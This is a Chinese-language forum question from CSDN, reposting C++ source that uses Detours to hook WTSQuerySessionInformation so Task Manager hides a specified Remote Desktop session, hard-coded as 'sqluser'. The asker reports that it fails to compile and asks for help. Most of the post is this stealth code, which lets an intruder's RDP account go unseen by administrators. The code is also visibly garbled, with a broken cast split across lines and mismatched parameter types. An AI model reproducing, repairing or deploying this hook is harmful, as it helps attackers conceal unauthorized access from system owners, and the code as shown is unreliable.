2 avisp avisp 于 2014.04.03 11:44 提问

Hook实现3389连接在任务管理器中隐身,任务管理器隐藏指定已连接用户!

出处:http://blog.sina.com.cn/s/blog_717e88030100xrj1.html

// dllmain.cpp
#include "stdafx.h"
extern "C" _declspec(dllexport) bool HideUserSession(TCHAR* wcsUserName, int iLen);
TCHAR gUserName[128];
int gLen;
static BOOL (WINAPI* TrueWTSQuerySessionInformation)(
__in HANDLE hServer,
__in DWORD SessionId,
__in WTS_INFO_CLASS WTSInfoClass,
__out LPTSTR ppBuffer,
__out DWORD *pBytesReturned
) = WTSQuerySessionInformation;
BOOL WINAPI HookWTSQuerySessionInformation(
__in HANDLE hServer,
__in DWORD SessionId,
__in WTS_INFO_CLASS WTSInfoClass,
__out LPTSTR *ppBuffer,
__out DWORD *pBytesReturned
){
TrueWTSQuerySessionInformation(hServer, SessionId, WTSInfoClass, ppBuffer, pBytesReturned);
if(strncmp((char
)*ppBuffer, (char*)gUserName, gLen) == 0){
return false;
}
return true;
}
BOOL APIENTRY DllMain( HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
{
ZeroMemory(gUserName, 128 * 2);
HideUserSession(L"sqluser", sizeof(L"sqluser"));
break;
}
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
//DetourTransactionBegin();
//DetourUpdateThread(GetCurrentThread());
//DetourDetach(&(PVOID&)TrueWTSQuerySessionInformation, HookWTSQuerySessionInformation);
//DetourTransactionCommit();
break;
}
return TRUE;
}
extern "C" _declspec(dllexport) bool HideUserSession(TCHAR* wcsUserName, int iLen){
CopyMemory(gUserName, wcsUserName, iLen);
gLen = iLen;
DetourRestoreAfterWith();
DetourTransactionBegin();
DetourUpdateThread(GetCurrentThread());
DetourAttach(&(PVOID&)TrueWTSQuerySessionInformation, HookWTSQuerySessionInformation);
LONG error = DetourTransactionCommit();
if (error == NO_ERROR) {
//::MessageBox(NULL, L"load detours success!", L"tips", 0);
return true;
}
else {
//::MessageBox(NULL, L"load detours failed!", L"tips", 0);
return false;
}
}

无意发现,觉得有点意思,但是以上源码本人编译不通过,在下菜鸟学者,求助高手!

Csdn user default icon
上传中...
上传图片
插入图片
准确详细的回答,更有利于被提问者采纳,从而获得C币。复制、灌水、广告等回答会被删除,是时候展现真正的技术了!